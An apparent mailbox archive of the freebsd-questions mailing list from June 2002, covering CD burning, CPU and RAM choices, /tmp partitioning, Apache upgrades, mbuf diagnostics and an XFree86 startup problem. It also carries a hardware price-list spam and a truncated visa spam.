cdrdao is the only way to go.. but.. I need to know how to use it on an ide cdrom. where can I look for help? -Darren __________________________________________________ Do You Yahoo!? Yahoo! - Official partner of 2002 FIFA World Cup http://fifaworldcup.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 13:18:10 2002 Delivered-To: freebsd-questions@freebsd.org Received: from PHSEXCHICI2.Partners.org (phsexchici2.partners.org [170.223.254.21]) by hub.freebsd.org (Postfix) with ESMTP id EB7D237B401 for ; Mon, 24 Jun 2002 13:18:06 -0700 (PDT) Received: by phsexchici2.partners.org with Internet Mail Service (5.5.2650.21) id ; Mon, 24 Jun 2002 16:18:06 -0400 Message-ID: <375F68784081D511908A00508BE3BB1701EF1BEE@phsexch22.mgh.harvard.edu> From: "Morse, Richard E." To: 'Changpeng Zhao' , freebsd-questions@FreeBSD.ORG Subject: RE: user forum Date: Mon, 24 Jun 2002 16:18:00 -0400 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: text/plain; charset="ISO-8859-1" Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Changpeng Zhao [mailto:cz@building2.co.jp] wrote: > Why don't you set up an online user-forum? > > Forums are far better than mailings list and newsgroups for > user (peer-to-peer) support. There are free forum packages > out there and the installation is very easy. I'm kind of curious about this -- why do you find that web forums are better? I find that email lists make more sense -- the interface is much faster (because you don't have to query the server for a ton of pictures for every page you load), and I can choose to keep some messages that have info I might want later, while trashing messages that don't interest me... Perhaps it's just that every web-based forum I've ever used is slow and clunky... Ricky To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 13:18:37 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mta05-svc.ntlworld.com (mta05-svc.ntlworld.com [62.253.162.45]) by hub.freebsd.org (Postfix) with ESMTP id BCDC737B403 for ; Mon, 24 Jun 2002 13:18:15 -0700 (PDT) Received: from lungfish.ntlworld.com ([80.4.0.215]) by mta05-svc.ntlworld.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP id <20020624201814.IARM2755.mta05-svc.ntlworld.com@lungfish.ntlworld.com>; Mon, 24 Jun 2002 21:18:14 +0100 Received: from tuatara.goatsucker.org (tuatara.goatsucker.org [192.168.1.6]) by lungfish.ntlworld.com (8.11.6/8.11.6) with ESMTP id g5OKIDV97348; Mon, 24 Jun 2002 21:18:13 +0100 (BST) (envelope-from scott@tuatara.goatsucker.org) Received: (from scott@localhost) by tuatara.goatsucker.org (8.12.3/8.12.3/Submit) id g5OKIC19003201; Mon, 24 Jun 2002 21:18:12 +0100 (BST) (envelope-from scott) Date: Mon, 24 Jun 2002 21:18:12 +0100 From: Scott Mitchell To: Rodolfo Gonzalez Cc: Matt Snow , Steve Warwick , freebsd-questions@FreeBSD.ORG Subject: Re: [OFF] Pentium vs Athlon which is better Message-ID: <20020624211811.A335@fishballoon.dyndns.org> References: <20020623234217.N24434-100000@seven.slakin.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from rodolfo@equinoxe.g-networks.net on Mon, Jun 24, 2002 at 12:10:07PM -0400 X-Operating-System: FreeBSD 4.6-STABLE i386 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Mon, Jun 24, 2002 at 12:10:07PM -0400, Rodolfo Gonzalez wrote: > On Sun, 23 Jun 2002, Matt Snow wrote: > > > As an addendum, any opinion on components? [motherboard, ram, HD, NIC etc] > > There's a small problem with AMD's, you need a very good fan or cooling > system. Well, you need a heatsink that's approved by AMD, which is not really a problem. Hopefully your server is going to be located somewhere you don't care about the noise it makes, so you can put some nice big fans in the case and everything will be fine. A lot of recent Athlon boards properly support the chip's thermal diode, so your system will at least shut down safely if your cooling does die. That said, my Athlon XP 1800+ box runs perfectly happily and almost silently with a 'flower cooler' http://from www.quietpc.com/ and a couple of 1500RPM fans. IMHO this belief that Athlon systems always need extreme cooling is often overstated; it's probably the fault of all the overclocking nuts trying to squeeze every last MHz out of their machines... now you do need some serious cooling to pull that kind of thing off :-) Make sure your cooling and power supply are AMD approved, and use major-brand RAM -- I've personally never had any problems with Crucial/Micron RAM. Scott -- =========================================================================== Scott Mitchell | PGP Key ID | "Eagles may soar, but weasels Cambridge, England | 0x54B171B9 | don't get sucked into jet engines" scott.mitchell@mail.com | 0xAA775B8B | -- Anon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 13:20:44 2002 Delivered-To: freebsd-questions@freebsd.org Received: from smtp02.wxs.nl (smtp02.wxs.nl [195.121.6.54]) by hub.freebsd.org (Postfix) with ESMTP id BBA9937B406 for ; Mon, 24 Jun 2002 13:20:14 -0700 (PDT) Received: from alex.kruijff ([213.10.151.186]) by smtp02.wxs.nl (Netscape Messaging Server 4.15) with ESMTP id GY88HP02.11Q; Mon, 24 Jun 2002 22:20:13 +0200 Date: Mon, 24 Jun 2002 22:21:03 +0200 From: Alex X-Mailer: The Bat! (v1.53d) Reply-To: freebsd-reply@akruijff.dds.nl X-Priority: 3 (Normal) Message-ID: <15118143729.20020624222103@dds.nl> To: "Philip J. Koenig" Cc: questions@FreeBSD.ORG Subject: Re[2]: root partition In-Reply-To: <20020624195803617.AAA703@empty1.ekahuna.com@pc02.ekahuna.com> References: <20020624195803617.AAA703@empty1.ekahuna.com@pc02.ekahuna.com> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Dear Philip, Monday, June 24, 2002, 9:58:02 PM, you wrote: >> Date: Mon, 24 Jun 2002 12:36:24 -0500 (CDT) >> From: Jason P Holland >> >> yes, absolutely, that is a best practice. if /var fills up, you don't >> want that to affect /. also, /tmp should be seperate, because its a DoS >> since /tmp can be written by any user, they could conceivably fill up /. >> the only case this would be ok, would be if you were installing on a >> smaller hard drive, which gives you less room to juggle around. >> >> jason PJK> Yep. My usual practice is to create a separate /var partition, PJK> create /var/tmp, and symlink /tmp to /var/tmp. I usaly do /usr/tmp -> /tmp /var/tmp -> /tmp and in /etc/fstab /dev/ad1s1f /tmp ufs rw,nodev,nosuid 2 2 For security reasons, because tmp is a all write dir. -- Best regards, Alex The FreeBSD handbook www.freebsd.org/handbook The mailing lists http://www.freebsd.org/support.html#mailing-list How to get best results from the FreeBSD- questions mailing list http://www.freebsd.org/doc/en_US.ISO8859-1/articles/freebsd-questions/index.html Alternative: http://www.lemis.com/questions.html To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 13:38:28 2002 Delivered-To: freebsd-questions@freebsd.org Received: from patriarch.dnsalias.org (adsl-65-69-1-221.dsl.hstntx.swbell.net [65.69.1.221]) by hub.freebsd.org (Postfix) with ESMTP id 6427F37B404 for ; Mon, 24 Jun 2002 13:38:23 -0700 (PDT) Received: from compgeek ([127.0.0.1]) by patriarch.dnsalias.org with Microsoft SMTPSVC(5.0.2195.4905); Mon, 24 Jun 2002 15:38:22 -0500 Reply-To: From: "Jon Noack" To: "Adam Weinberger" , "Margie W" Cc: Subject: RE: Least Painful Upgrade Path Date: Mon, 24 Jun 2002 15:38:22 -0500 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) In-Reply-To: <20020624114712.A475@crackula.com> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal X-OriginalArrivalTime: 24 Jun 2002 20:38:22.0849 (UTC) FILETIME=[1537FF10:01C21BBF] Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG > if you DID put your stuff under /usr/local/www/data then you > will have to backup your data, but again the httpd.conf should > remain undamaged. no reason not to back it up though ::) Although you should always back up your data before any upgrade, the above is only true if you put your stuff in /usr/local/www/data with it still symlinked to /usr/local/www/data.default (data -> data.default). Some of the ports assumed that the data.default directory was free to remove -- if data was still symlinked then you were out of luck. What I have always done has been to remove the symlink and recreate the data directory as a real directory. This method has never caused me any problems since FreeBSD 4.2 w/ Apache 1.3.12 through FreeBSD 4.6 w/ Apache 2.0.39. Jon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 13:56:50 2002 Delivered-To: freebsd-questions@freebsd.org Received: from c007.snv.cp.net (h000.c007.snv.cp.net [209.228.33.228]) by hub.freebsd.org (Postfix) with SMTP id 6A95537B403 for ; Mon, 24 Jun 2002 13:55:15 -0700 (PDT) Received: (cpmta 11541 invoked from network); 24 Jun 2002 13:55:08 -0700 Received: from 65.190.43.13 (HELO SERVIDOR) by smtp.directvinternet.com (209.228.33.228) with SMTP; 24 Jun 2002 13:55:08 -0700 X-Sent: 24 Jun 2002 20:55:08 GMT Message-ID: <048e01c21bc1$69a95ba0$0d2bbe41@SERVIDOR> From: "Sercoinca INC." To: "Sercoincainc" Subject: PRECIOS 6/24/2002 OFERTAS Date: Mon, 24 Jun 2002 16:53:19 -0400 Organization: SERCOINCA INC MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0481_01C21B9F.A5D7AB80" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG This is a multi-part message in MIME format. ------=_NextPart_000_0481_01C21B9F.A5D7AB80 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable ESPECIALES =20 NOTEBOOK TOSHIBA 1905-S301 PS192U-0011JWX P4-2G 256/40GB DVD-CDRW 56K/LAN 15XGA WXP = NEW $2,099.00 =20 -------------------------------------------------------------------------= ------- NOTEBOOKS EN ESPANOL=20 PS183U-00VFSPNC Satellite 1800-S207 Spanish Cel 1.1Ghz,14.1", 256Mb,20Gb,DVD-CRW $ 1360.70=20 1 =20 =20 PS183U-00WKSPNC SATELLITE 1800-S233 CEL-1.1G 20G 256MB XPP 15. DVD/CDRW Esp $ 1440.38=20 =20 =20 PS610U-000W1SNC SATELLITE PRO 6100 P4-1.5G 30GB 256MB XPP/W2K 14 DVD/C Esp $ 1800.92=20 =20 -------------------------------------------------------------------------= ------- LBS Cash Drawer The LBS Cash Drawers are loaded with many value added features that allow you to adjust the drawer to fit your cash management needs. Key Features * Micro switch for drawer open feed back status detection. * Adjustable dividers for four or five compartments. * Spring loaded bill clips. * Separated coin tray removable from the bill tray with adjustable. dividers for up to nine compartments. * Front access slot for checks, credit card receipts or any papers. * Robust metal construction. * Drawer: Heavy duty metal drawer with security key lock. * Dimensions: 420(w) x 440(L) x 105(H) mm. * Weigth : 20 lbs (9kg). * Distributor Prices * Epson / Star Micronics Printer Interface $ 69 (**) -------------------------------------------------------------------------= ------- CELERON =20 Celeron 1.0 Box 256 KB $63.75=20 Celeron 1.1 Box 256KB $66.00=20 Celeron 1.2 Box 256KB $74.00=20 Celeron 1.7 Box 128KB PGA $88.00=20 Celeron 1.2 Tray 256KB FCPGA $71.00=20 Celeron 1.3 Tray 256KB FCPGA $76.00=20 Celeron 1.4 Tray 256KB FCPGA $91.00=20 Celeron 850 Tray 128KB $53.50=20 Celeron 1.8 Box 128KB PGA $108.00=20 PENTIUM III =20 Pent III 1.133 256KB Box $120.00=20 Pent III 1.0GB 256KB Box Volt 1.75 $127.00=20 Pent III 1.2 256KB Box $130.00=20 Pentium III 512KB =20 Pent III 1.2EB 512KB Box for servers $215.50=20 Pent III 1.4EB 512KB Box for servers $310.00=20 Pent III 1.133 512KB Box for servers $157.00=20 XEON =20 Pent III Xeon 1GHz 256KB 133 SECC $455.00=20 Pent III Xeon 700 1mb 100 SECC $1,220.00=20 Xeon 2.0 512KB 133 MPGA $270.00=20 Xeon 2.2 512KB 133 MPGA $305.00=20 Xeon 2.4 512KB 133 MPGA $665.00=20 Xeon 1.8 512KB 133 MPGA $240.00=20 PENTIUM 4 =20 Pent 4 1.4 OEM 256kb $114.00=20 Pent 4 1.5 OEM 256KB $124.00=20 Pent 4 1.5 Box 256KB $133.00=20 Pent 4 1.8 OEM 256KB $165.00=20 Pent 4 1.8 Box 256/512KB Socket 478 $172.00=20 Pent 4 1.8 OEM256KB Socket 423 $168.00=20 Pent 4 1.9 Box 256/512KB socket 478 $182.00=20 Pent 4 2.0 Box 512KB socket 478 $203.00=20 Pent 4 2.2 Box 512KB socket 478 $248.00=20 Mother Boards =20 MB D815EGEWU Sound, Video, 4 PCI, uATX $83.50=20 MB D815EGEWLU Sound, Video, Lan 4 PCI, uATX $95.00=20 MB D815EFVL Sound, Video,Lan, uATX, 3 PCI $109.00=20 MBD845BG, ATX, 6PCI, Sound, 2 Memory Slot DDR $103.00=20 MB850MD, uATX,3 PCI, Sound $132.00=20 MB D845PTL mATX,Sound,Lan,3PCI, DDR Sdram $111.00=20 MB D845HV Sound,3 PCI, mATX, 4X AGP $101.00=20 MB D850EMV2 for P4 & Celeron, Sound,3PCI,Rdram $144.00=20 MB D850MVL , ATX, 5 PCI,Sound, Lan $144.00=20 MB D850EMV2L, sound, lan, Pent 4 & Celeron $154.00=20 -------------------------------------------------------------------------= ------- SERCOINCA INC=20 For more Information Please contact GRECIA or JUAN=20 3900 nw 79 av. Suite 532 Miami, FL - 33166 - USA=20 Tel 305-5932991 Fax 305-5938197 Cel 305-2189064 email: sercoinc@bellsouth.net msn: gbuysse2001@hotmail.com ------=_NextPart_000_0481_01C21B9F.A5D7AB80 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
ESPECIALES
 
 
NOTEBOOK=20 TOSHIBA
 
1905-S301 PS192U-0011JWX P4-2G 256/40GB DVD-CDRW 56K/LAN 15XGA WXP NEW

$2,099.00


NOTEBOOKS EN = ESPANOL 

PS183U-00VFSPNC

Satellite = 1800-S207=20 Spanish Cel 1.1Ghz,14.1", 256Mb,20Gb,DVD-CRW

$=20 1360.70=20

1

=

 

PS183U-00WKSPNC

SATELLITE=20 1800-S233 CEL-1.1G 20G 256MB XPP 15. DVD/CDRW = Esp

$=20 1440.38=20

=

 

PS610U-000W1SNC

SATELLITE=20 PRO 6100 P4-1.5G 30GB 256MB XPP/W2K 14 DVD/C = Esp

$=20 1800.92=20

=



3D""LBS = Cash Drawer
The LBS=20 Cash Drawers are loaded with many value = added=20 features that
allow you to adjust the drawer = to fit your=20 cash management needs.
Key = Features
* Micro switch for drawer open = feed back=20 status detection.
* Adjustable dividers for four = or five=20 compartments.
* Spring loaded bill=20 clips.
* Separated coin tray removable = from the=20 bill tray with adjustable.
   dividers for up to = nine=20 compartments.
* Front access slot for checks, = credit card=20 receipts or any papers.
* Robust metal=20 construction.
* Drawer: Heavy duty metal = drawer with=20 security key lock.
* Dimensions: 420(w) x 440(L) x = 105(H)=20 mm.
* Weigth : 20 lbs=20 (9kg).
* Distributor = Prices
  * Epson / Star Micronics = Printer Interface $ 69=20 (**)

 
           &n= bsp;           &nb= sp;           &nbs= p;  =20 CELERON  
Celeron 1.0 Box 256 KB $63.75
Celeron 1.1 Box 256KB $66.00
Celeron 1.2 Box 256KB $74.00
Celeron 1.7 Box 128KB PGA $88.00
Celeron 1.2 Tray 256KB FCPGA $71.00
Celeron 1.3 Tray 256KB FCPGA $76.00
Celeron 1.4 Tray 256KB FCPGA $91.00
Celeron 850 Tray 128KB $53.50
Celeron 1.8 Box 128KB PGA $108.00
           &n= bsp;           &nb= sp;           &nbs= p;=20 PENTIUM III  
Pent III 1.133 256KB Box $120.00
Pent III 1.0GB 256KB Box Volt 1.75 $127.00
Pent III 1.2 256KB = Box  $130.00
           &n= bsp;           &nb= sp;           =20 Pentium III 512KB  
Pent III 1.2EB 512KB Box for servers $215.50
Pent III 1.4EB 512KB Box for servers $310.00
Pent III 1.133 512KB Box for servers $157.00
           &n= bsp;           &nb= sp;       =20    XEON  
Pent III Xeon 1GHz 256KB 133 SECC $455.00
Pent III Xeon 700 1mb 100 SECC $1,220.00
Xeon 2.0 512KB 133 MPGA $270.00
Xeon 2.2 512KB 133 MPGA $305.00
Xeon 2.4 512KB 133 MPGA $665.00
Xeon 1.8 512KB 133 MPGA $240.00
           &n= bsp;           &nb= sp;          =20 PENTIUM 4  
Pent 4 1.4 OEM 256kb $114.00
Pent 4 1.5 OEM 256KB $124.00
Pent 4 1.5 Box 256KB $133.00
Pent 4 1.8 OEM 256KB $165.00
Pent 4 1.8 Box 256/512KB Socket 478 $172.00
Pent 4 1.8 OEM256KB Socket 423 $168.00
Pent 4 1.9 Box 256/512KB socket 478 $182.00
Pent 4 2.0 Box 512KB socket 478 $203.00
Pent 4 2.2 Box 512KB socket 478 $248.00
           &n= bsp;           &nb= sp;    =20 Mother = Boards  
MB D815EGEWU Sound, Video, 4 PCI, uATX $83.50
MB D815EGEWLU Sound, Video, Lan 4 PCI, uATX $95.00
MB D815EFVL Sound, Video,Lan, uATX, 3 PCI $109.00
MBD845BG, ATX, 6PCI, Sound, 2 Memory Slot DDR $103.00
MB850MD, uATX,3 PCI, Sound $132.00
MB = D845PTL=20 mATX,Sound,Lan,3PCI, DDR Sdram  $111.00
MB D845HV Sound,3 PCI, mATX, 4X AGP $101.00
MB D850EMV2 for P4 & Celeron, Sound,3PCI,Rdram $144.00
MB D850MVL , ATX, 5 PCI,Sound, Lan $144.00
MB D850EMV2L, sound, lan, Pent 4 & Celeron $154.00

SERCOINCA INC
For more Information Please = contact=20  GRECIA or JUAN
3900 nw 79 av. Suite 532 Miami, FL - 33166 - = USA=20
Tel 305-5932991    Fax 305-5938197    = Cel=20 305-2189064

email:
sercoinc@bellsouth.net
<= /FONT>
msn: gbuysse2001@hotmail.com

------=_NextPart_000_0481_01C21B9F.A5D7AB80-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 14: 3:44 2002 Delivered-To: freebsd-questions@freebsd.org Received: from salmon.maths.tcd.ie (salmon.maths.tcd.ie [134.226.81.11]) by hub.freebsd.org (Postfix) with SMTP id 75ACA37B47E for ; Mon, 24 Jun 2002 14:02:10 -0700 (PDT) Received: from walton.maths.tcd.ie by salmon.maths.tcd.ie with SMTP id ; 24 Jun 2002 22:01:53 +0100 (BST) To: sig Cc: freebsd-questions@FreeBSD.ORG Subject: Re: minfo output: junk in mbufs. can someone comment this? In-Reply-To: Your message of "Mon, 24 Jun 2002 19:56:53 +0300." <18021465385.20020624195653@uct.kiev.ua> Date: Mon, 24 Jun 2002 22:01:48 +0100 From: Ian Dowse Message-ID: <200206242201.aa79934@salmon.maths.tcd.ie> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG In message <18021465385.20020624195653@uct.kiev.ua>, sig writes: > 503/15000 pages used, 8048 mbuf-size slots >Checking cluster ref counts >Scanning cluster free list... 307 entries >Scanning mbuf free list... 703 entries >0xc18f1000: weird data 131331 @ 0x3 (min 0xc18f1014 max 0xc18f1100) >0xc18f1100: weird data 2 @ 0x37 (min 0xc18f1114 max 0xc18f1200) >0xc18f1200: weird data 2 @ 0x0 (min 0xc18f1214 max 0xc18f1300) >0xc18f1300: weird data 0 @ 0x2 (min 0xc18f1314 max 0xc18f1400) >0xc18f1400: weird data 137669068 @ 0x1 (min 0xc18f1414 max 0xc18f1500) >0xc18f1500: weird data 30 @ 0x0 (min 0xc18f1514 max 0xc18f1600) >0xc18f1600: weird data 0 @ 0x10 (min 0xc18f1614 max 0xc18f1700) >Checking for unreferenced clusters. > > >Is this a "normal" behavior? Yes, a few "weird data" lines are quite normal, because the mbuf code allocates mbufs in groups of 16 at a time, and it does not initialise the newly-allocated ones before putting them on the free list. However it is not normal for the number of mbufs to continuously increase until they run out. If you leave the system for a few days, does the number of mbufs and clusters reported by netstat -m continue to rise? If so, check the "Send-Q" and "Recv-Q" columns of "netstat -an" first to see if there is data in stuck connections. You can also use minfo's "-x" option to dump all the mbuf contents to see if you can see a pattern that might suggest what code is to blame. Ian To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 14: 8: 4 2002 Delivered-To: freebsd-questions@freebsd.org Received: from smtp-send.myrealbox.com (smtp-send.myrealbox.com [192.108.102.143]) by hub.freebsd.org (Postfix) with ESMTP id 0544237B400 for ; Mon, 24 Jun 2002 14:08:00 -0700 (PDT) Received: from jud [12.33.164.6] by myrealbox.com with NetMail ModWeb Module; Mon, 24 Jun 2002 17:07:51 -0400 Subject: Re: [OFF] Pentium vs Athlon which is better From: "Jud" To: scott.mitchell@mail.com Cc: rodolfo@equinoxe.g-networks.net, drama@slakin.net, ukla@attbi.com, freebsd-questions@FreeBSD.ORG Date: Mon, 24 Jun 2002 17:07:51 -0400 X-Mailer: NetMail ModWeb Module X-Sender: jud MIME-Version: 1.0 Message-ID: <1024952871.4c50fffcjud@myrealbox.com> Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: quoted-printable Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG -----Original Message----- From: Scott Mitchell To: Rodolfo Gonzalez Date: Mon, 24 Jun 2002 21:18:12 +0100 Subject: Re: [OFF] Pentium vs Athlon which is better On Mon, Jun 24, 2002 at 12:10:07PM -0400, Rodolfo Gonzalez wrote: > On Sun, 23 Jun 2002, Matt Snow wrote: > > > As an addendum, any opinion on components? [motherboard, ram, HD, NIC= etc] >=20 > There's a small problem with AMD's, you need a very good fan or cooling= =20 > system. [snip] Make sure your cooling and power supply are AMD approved, and use major-brand RAM -- I've personally never had any problems with Crucial/Micron RAM. =09Scott _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ I like Crucial myself - which brings up a point re DDR RAM. DDR is less expensive than RDRAM. DDR is mainly identified with AMD chips, though there are Intel DDR motherboards available. I've owned a couple of AMD CPUs with DDR RAM motherboards and have been quite happy with them. If you want to use more than one CPU, my impression from reading (I have no experience nor expertise in this area, so take this for what little it's worth) is that AMD's support is at an earlier stage than is Intel's. It's also my impression (with the same disclaimer) that improved multi-CPU performance and stability is a goal of the FreeBSD project for the 5.x (-CURRENT) version. Jud To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 14: 9: 0 2002 Delivered-To: freebsd-questions@freebsd.org Received: from smtp-send.myrealbox.com (smtp-send.myrealbox.com [192.108.102.143]) by hub.freebsd.org (Postfix) with ESMTP id 15A0737B400 for ; Mon, 24 Jun 2002 14:08:49 -0700 (PDT) Received: from jogega jogegabsd@smtp-send.myrealbox.com [216.230.149.185] by smtp-send.myrealbox.com with NetMail SMTP Agent $Revision: 3.9 $ on Novell NetWare; Mon, 24 Jun 2002 15:08:48 -0600 From: "jogegabsd" To: Subject: RE: XFREE86[copy to the list] Date: Mon, 24 Jun 2002 15:08:53 -0600 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-9" Content-Transfer-Encoding: 8bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal In-Reply-To: <000901c21bbb$9f02f280$4ec683d9@mkeremguc> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG > -----Original Message----- > From: Mahmut Kerem Güç [mailto:mkeremguc@superonline.com] > Sent: Monday, June 24, 2002 2:14 PM > To: jogegabsd > Subject: Re: XFREE86 > > > > ----- Original Message ----- > From: "jogegabsd" > To: "Mahmut Kerem Güç" ; > > Sent: Monday, June 24, 2002 7:41 PM > Subject: RE: XFREE86 > > > > What is the error you got? > > What are are you trying to run? startx? > > Do you have a configuration file? > > > > We all here are glad to help, but we need a little details. > > > > HTH > > > > Gerardo Amaya > > hi, > > sorry for not giving details. yes i have a XF86Config file in > /etc/X11 . And > (as i think) it is configured correctly because it gives the > display without > problems. > Now i am giving some console messages after typing startx. > ----------- > > xauth: (argv) :1: bad displayname ":0" in "list" command > xauth: (argv) :1: bad displayname ":0" in "add" command > > couldn't find init font path element > /usr/X11R6/lib/X11/fonts/Speedo/ , > removing from list! > > waiting for X Server to shut down Jun 25 01:25:58 /kernel: pid 138 > (gnome-session), uid: 0: exited on signal 11 (core dumped) > > xauth: (argv) :1: bad displayname ":0" in "remove" command > > ------- > now this is the lines when i enter and exit x by typing > startx. When i type > startx, screen comes (with 1024x768 as i configured) and says > "couldn not > look up internet address for . This will prevent gnome from operating > correctly It may be possible to correct the problem by adding to the > /etc/hosts" > > i press "continue" button and it exits. and another thing is > i think i dont > have a computer name cause it just says "couldn't look up > internet address > for " not mentioning a name. > > what is the purpose for saying "x server will shut down June > 25" ? is not it > possibleto run x server for ever? :) . i have a dial-up > modem connected and > don't have a network configuration or something. And if i > type xdm a login > screen comes and when i enter login(s) (both root and a user > acc) the screen > disappears and comes back with the same screen. > > if you can help, i will be very happy > > thanks > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 14:13: 2 2002 Delivered-To: freebsd-questions@freebsd.org Received: from seven.slakin.net (adsl-67-112-126-134.dsl.pltn13.pacbell.net [67.112.126.134]) by hub.freebsd.org (Postfix) with ESMTP id 3BE1537B400 for ; Mon, 24 Jun 2002 14:12:57 -0700 (PDT) Received: from localhost (localhost.slakin.net [127.0.0.1]) by seven.slakin.net (Postfix) with ESMTP id 1E252708; Mon, 24 Jun 2002 14:13:01 -0700 (PDT) Date: Mon, 24 Jun 2002 14:13:01 -0700 (PDT) From: Matt Snow To: Jud Cc: scott.mitchell@mail.com, , , Subject: Re: [OFF] Pentium vs Athlon which is better In-Reply-To: <1024952871.4c50fffcjud@myrealbox.com> Message-ID: <20020624141205.U34522-100000@seven.slakin.net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG I am running K-Byte RAM fine, as well as some no name brand. Both boxes are running strong. * * * * * * * * Matt Snow (@) drama@slakin.net (w) http://slakin.net. On Mon, 24 Jun 2002, Jud wrote: > > > -----Original Message----- > From: Scott Mitchell > To: Rodolfo Gonzalez > Date: Mon, 24 Jun 2002 21:18:12 +0100 > Subject: Re: [OFF] Pentium vs Athlon which is better > > On Mon, Jun 24, 2002 at 12:10:07PM -0400, Rodolfo Gonzalez wrote: > > On Sun, 23 Jun 2002, Matt Snow wrote: > > > > As an addendum, any opinion on components? [motherboard, ram, HD, NIC etc] > > > > There's a small problem with AMD's, you need a very good fan or cooling > > system. > > [snip] > Make sure your cooling and power supply are AMD approved, and use > major-brand RAM -- I've personally never had any problems with > Crucial/Micron RAM. > > Scott > > _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ > > > I like Crucial myself - which brings up a point re DDR > RAM. DDR is less expensive than RDRAM. DDR is mainly > identified with AMD chips, though there are Intel > DDR motherboards available. > > I've owned a couple of AMD CPUs with DDR RAM > motherboards and have been quite happy with them. > > If you want to use more than one CPU, my impression > from reading (I have no experience nor expertise in > this area, so take this for what little it's worth) > is that AMD's support is at an earlier stage than is > Intel's. It's also my impression (with the same > disclaimer) that improved multi-CPU performance and > stability is a goal of the FreeBSD project for the > 5.x (-CURRENT) version. > > Jud > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 14:19:35 2002 Delivered-To: freebsd-questions@freebsd.org Received: from gnome02.net.rol.ru (gnome02.net.rol.ru [194.67.1.180]) by hub.freebsd.org (Postfix) with ESMTP id 2DC5237B400; Mon, 24 Jun 2002 14:18:53 -0700 (PDT) Received: from ts18-a246.Moscow.dial.rol.ru ([195.239.5.246]:8719 "HELO Sender" ident: "TIMEDOUT" whoson: "-unregistered-" smtp-auth: TLS-CIPHER: TLS-PEER: ) by gnome02.net.rol.ru with SMTP id ; Tue, 25 Jun 2002 00:24:30 +0400 From: VISA <3exvisa@email.ru> To: "" <> Subject: ÏÀÑÏÎÐÒÍÎ-ÂÈÇÎÂÛÅ 